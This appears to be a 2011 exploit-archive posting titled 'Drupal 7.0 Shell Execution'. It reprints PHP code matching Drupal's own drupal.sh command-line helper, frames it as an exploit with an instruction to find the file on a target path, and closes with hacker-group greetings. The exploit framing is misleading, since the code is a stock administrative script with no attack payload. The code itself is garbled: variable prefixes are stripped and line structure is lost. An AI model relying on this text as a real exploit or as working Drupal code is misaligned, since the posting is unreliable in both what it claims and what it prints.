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Drupal 7.0 Shell Execution
来源:ked-h@exploit-id.com 作者:KedAns-Dz 发布时间:2011-04-11  
#!/usr/bin/env php

 * Drupal 7.0 Shell Execution Script
 * ================
 * By KedAns-Dz <ked-h@exploit-id.com>
 * ================
 * (+) In any Drupal , detecting the file >> http://[local/Path]/scripts/drupal.sh 
 * The content file 'drupal.sh' is this PHP CODE for EXECUTING Scripts
 * ================
 * ------------------------
 * Check for your PHP interpreter - on Windows you'll probably have to
 * replace line 1 with : 
 * #!c:/program files/php/php.exe
 * @param path  Drupal's absolute root directory in local file system (optional).
 * @param URI   A URI to execute, including HTTP protocol prefix.
$script = basename(array_shift(
SERVER['argv'])); if (in_array('--help',
SERVER['argv']) || empty(
SERVER['argv'])) { echo <<<EOF Execute a Drupal page from the shell. Usage: {$script} [OPTIONS] "<URI>" Example: {$script} "http://target.org/node" All arguments are long options. --help This page. --root Set the working directory for the script to the specified path. To execute Drupal this has to be the root directory of your Drupal installation, f.e. /home/www/foo/drupal (assuming Drupal running on Unix). Current directory is not required. Use surrounding quotation marks on Windows. --verbose This option displays the options as they are set, but will produce errors from setting the session. URI The URI to execute, i.e. http://default/foo/bar for executing the path '/foo/bar' in your site 'default'. URI has to be enclosed by quotation marks if there are ampersands in it (f.e. index.php?q=node&foo=bar). Prefix 'http://' is required, and the domain must exist in Drupal's sites-directory. If the given path and file exists it will be executed directly, i.e. if URI is set to http://default/bar/foo.php and bar/foo.php exists, this script will be executed without bootstrapping Drupal. To execute Drupal's cron.php, specify http://default/cron.php as the URI. To run this script without --root argument invoke it from the root directory of your Drupal installation with ./scripts/{$script} \n EOF; exit; } // define default settings $cmd = 'index.php';
SERVER['HTTP_HOST'] = 'default';
SERVER['PHP_SELF'] = '/index.php';
SERVER['HTTP_USER_AGENT'] = 'console'; // toggle verbose mode if (in_array('--verbose',
SERVER['argv'])) {
verbose_mode = true; } else {
verbose_mode = false; } // parse invocation arguments while ($param = array_shift(
SERVER['argv'])) { switch ($param) { case '--root': // change working directory $path = array_shift(
SERVER['argv']); if (is_dir($path)) { chdir($path); if (
verbose_mode) { echo "cwd changed to: {$path}\n"; } } else { echo "\nERROR: {$path} not found.\n\n"; } break; default: if (substr($param, 0, 2) == '--') { // ignore unknown options break; } else { // parse the URI $path = parse_url($param); // set site name if (isset($path['host'])) {
SERVER['HTTP_HOST'] = $path['host']; } // set query string if (isset($path['query'])) {
SERVER['QUERY_STRING'] = $path['query']; parse_str($path['query'],
GET; } // set file to execute or Drupal path (clean urls enabled) if (isset($path['path']) && file_exists(substr($path['path'], 1))) {
SERVER['REQUEST_URI'] = $path['path']; $cmd = substr($path['path'], 1); } elseif (isset($path['path'])) { if (!isset(
GET['q'])) {
REQUEST['q'] =
GET['q'] = $path['path']; } } // display setup in verbose mode if (
verbose_mode) { echo "Hostname set to: {
SERVER['HTTP_HOST']}\n"; echo "Script name set to: {$cmd}\n"; echo "Path set to: {
GET['q']}\n"; } } break; } } if (file_exists($cmd)) { include $cmd; } else { echo "\nERROR: {$cmd} not found.\n\n"; } exit(); /***============================================================================================ ***================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== * Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > * Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz * Masimovic * TOnyXED * r0073r (inj3ct0r.com) * TreX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz * Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (1923turk.com) * Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{ * Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX * Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} , * 1337day.com * www.packetstormsecurity.org * exploit-db.com * bugsearch.net * exploit-id.com * www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ... *================================================================================================ */

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